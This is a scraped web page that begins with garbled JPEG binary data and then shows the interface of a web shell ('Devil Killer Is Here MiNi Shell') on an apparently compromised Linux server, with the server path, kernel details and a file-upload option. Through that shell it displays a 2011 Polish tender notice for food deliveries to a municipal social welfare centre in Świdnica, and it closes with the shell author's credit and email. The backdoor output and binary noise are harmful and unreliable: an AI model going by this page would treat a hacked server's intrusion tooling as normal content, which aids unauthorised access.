JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110218/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110218/25614-N-2011.html

<p class="kh_header"><b>Świdnica: Dostawa artykułów żywnościowych na potrzeby Miejskiego Ośrodka Pomocy Społecznej</b><br>
<b>Numer ogłoszenia: 25614 - 2011; data zamieszczenia: 18.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Wałbrzyska 15, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8537139, faks 074 8537139.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.swidnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych na potrzeby Miejskiego Ośrodka Pomocy Społecznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów żywnościowych na potrzeby Miejskiego Ośrodka Pomocy Społecznej w Świdnicy wraz z dostawą i rozładunkiem w ośrodku wsparcia Dom Dziennego Pobytu Przystań przy ul.Saperów 27 w Świdnicy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.50.00.00-3, 15.51.10.03-3, 15.80.00.00-9, 15.20.00.00-0, 15.30.00.00-0, 15.33.10.00-0, 15.00.00.00-6, 31.42.50.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 9.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawcy wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków nastapi w oparciu o złożone oświadczenia i dokumenty wy formuły:spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków nastapi w oparciu o złożone oświadczenia i dokumenty wy formuły:spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków nastapi w oparciu o złożone oświadczenia i dokumenty wy formuły:spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków nastapi w oparciu o złożone oświadczenia i dokumenty wy formuły:spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków nastapi w oparciu o złożone oświadczenia i dokumenty wy formuły:spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pozostałe dokumenty:
1.  wypełniony formularz ofertowy ( załącznik nr 1)
2.  zestawienie kosztów  tabele od nr 1 do nr 7 w zależności, na który pakiet składana jest oferta  ( załącznik nr 2 )
3.  oświadczenie o spełnieniu warunków wynikających z art. 22 oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 24 stycznia 2004 r. Prawo Zamówień Publicznych ( załącznik nr 3 )
4.  zaakceptowany wzór umowy ( załącznik nr 4 )
5.  zaświadczenie z wpisu do ewidencji działalności gospodarczej lub innego właściwego rejestru (wystawione nie później niż na 3 miesiące przed upływem terminu ofert)
6.  zaświadczenie / decyzję o spełnieniu wymogów sanitarnych dotyczących środka
     transportu , zgodnie z obowiązującymi w tym zakresie przepisami
7.  umowę regulującą współpracę podmiotów występujących wspólnie jako jeden
     Wykonawca  -  jeśli dotyczy
8.  upoważnienie do podpisania oferty, w przypadku gdy oferta zostanie podpisana przez osobę, których uprawnienie do dokonania tej czynności nie wynika z innych dokumentów dołączonych do oferty</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.swidnica.bip-gov.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> osoba do kontaktu :Małgorzata Ćwiek
Dom Dziennego Pobytu 
ul.Saperów 27, 58-100 Świdnica 
tel.074/6407365;  074/8538770.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2011 godzina 09:00, miejsce: Miejski Ośrodek Pomocy Społecznej 
ul.Wałbrzyska 15
58-100 Świdnica
Sekretariat- pokój 203 II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 -Dostawa mięsa wieprzowego, wołowego,produktów mięsnych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Łopatka bez kości - 1800 kg, schab z kością -380 kg, boczek wędzony- 40kg, słonina bez skóry- 60 kg, antrykot z kością-80 kg, Wątroba wieprzowa- 40 kg, 
Kiełbasa zwyczajna extra- 100kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 9.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 Dostawa mięsa drobiowego i podrobów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filety z kurczaka - piersi bez kości i skóry -350 kg;Porcja rosołowa ze skrzydłami -680 kg; Udko z kurczaka świeże- 720 kg;Wątroba drobiowa-80 kg;Flaki wołowe krojone luz - blanszowane-80 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 9.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 Dostawa mleka i wyrobów mleczarskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Śmietana 18%- 450 L; Mleko 2% w kartonie-10 L; Mleko 2% w woreczku-200 L; masełko 200g zaw. tł 82%- 140 szt; Margaryna  mleczna 250g- 400 szt;Ser biały półtłusty-220 kg; Jogurt naturalny 450g -30 szt;Kefir 450 g-30 szt; Kefir 150 g- 280 szt; Drożdże piekarskie 10g - 60 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 9.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 Dostawa pieczywa i wyrobow ciastkarskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb wiejski pytlowy 0,60 kg krojony 12/13 mm kromka pakowany w folię
-3400 szt; Bułka słodka nadziewana 0.08 kg- 250 szt; Bułka zwykła 100g -200 szt
200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 9.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5 Dostawa ryb i warzyw.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kalafior mrożony -50 kg; Fasola szparagowa mrożona- 50 kg; Szpinak liście  mrożony -50 kg; Włoszczyzna 4-skł mrożona- 250 kg; Zupa jarzynowa  6 skł
mrożona- 50 kg; Brokuł mrożony- 20 kg; Ryba  mrożona PANGA-400 kg;
Śledź po wiejsku- 24 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 9.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6 Dostawa warzyw,owoców i przetworów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> biała rzodkiew - 100 kg;buraki czerwone-600 kg;cebula-300 kg;czosnek-30kg;fasola sucha-80 kg;fasolka szparagowa w sezonie -100 kg;groch suchy łuskany połówki-90 kg;jabłka-400kg;Kalafior w sezonie-200szt;kapusta biała-600kg;
kapusta czerwona-270 kg;kapusta włoska-100 szt;koper -480 pęczek;mandarynki-40kg;marchew- 900 kg;ogórek zielony w sezonie-200 kg;papryka świeża-10kg;pekińska kapusta-100 kg;pieczarki-60kg;pietruszka korzeń-80kg;pietruszka zielona-250 pęczek;pomarańcze- 40 kg;pomidor w sezonie-80kg;Por-280kg;Rzodkiewka w sezonie-60 pęczek,Sałata w sezonie-400szt;Seler korzeń-250 kg;szczypior- 70 pęcz;Winogron biały-30 kg;ziemniaki zimowe-6000 kg;ziemniaki młode w sezonie -2400 kg;kapusta kiszona-600 kg;ogórki kiszone-230 kg;soki owocowe  koncentrat 490 ml-900 szt;kompot truskawka masa netto 900g -100 szt;
Kompot wiśnia masa netto 900g-100 szt,Kompot czarna porzeczka masa netto 900g
- 100 szt;chrzan konserwowy masa netto 280g - 30 szt;groszek konserwowy  
masa netto 400g-50 szt;koncentrat pomidorowy 0.2l  30%- 200 szt;koncentrat pomidorowy 0.9l  30%- 60 szt;kukurydza konserwowa  masa netto 400g-30 szt;
ogórki konserwowe masa netto 900 g- 30szt;papryka konserwowa masa netto 900 g- 30 szt;grzyby suszone- 1 kg;rodzynki- 1 kg; Patison konserwowy masa netto 900 g- 10 szt;Szczaw konserwowy masa netto  260g- 80 szt;Musztarda delikatesowa masa netto 500 g - 20 szt;Ketchup masa netto 500g-20 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-0, 15.33.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 9.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7 Dostawa jaj i pozostałych artykułów spozywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kurze klasa wagowa M klasa jakości A -3800 szt;Cukier 1kg -300 kg;Mąka poznańska  1 kg- 600 kg;Mąka ziemniaczana 1kg- 30 kg;Kasza manna błyskawiczna 500 g-80 kg,Kasza jęczmienna drobna -250 kg;Kasza gryczana-80 kg;Ryż  biały długoziarnisty-170 kg;Sól- 220 kg;Bułka tarta  luxusowa 500g-270 szt, Olej 1 l-450 szt;Jarzynka 200g-100 szt;Pieprz mielony  20g-220 szt;Papryka mielona słodka  25g
220 szt;Kwasek cytrynowy  50g- 100 szt;Liść laurowy 6g-50 szt,Ziele angielskie15g
- 50 szt;Proszek do pieczenia  30g- 30 szt;Cukier waniliowy 32g- 30 szt; Maggi  w płynie 1l -100 l;Majonez  0.9l- 30 szt,Makaron zacierka 4 jajeczny 250g -750 szt;
Makaron  1kg świder/ nitka- 400 szt;Zupa w proszku barszcz biały 66g- 180 szt;
Zupa w proszku  ogonowa  40g -80 szt;Zupa w proszku pieczarkowa  45g -170 szt;
Kawa  250g mielona- 10 szt;Kawa  rozpuszczalna ( 100% kawy naturalnej) 200g
- 10szt;Cukier puder 0.5 kg- 40 szt;Przyprawa do gyrosa 30gr- 100 szt;Paluszki słone 300 g - 20 szt;Paluszki z sezamem 300 g- 20 szt;Herbata expresowa  owocowa (opak 20 saszetek)-50 szt;Herbata expresowa (50 saszetek) 100g
- 10 szt;Herbatniki z cukrem opak 2 kg -20 szt;Ciastka kruche z galaretką opak 2 kg
-20 szt;Cukierki owocowe luz -4 kg; Sos myśliwski w proszku 33 g-30 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.42.50.00-, 15.00.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 9.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com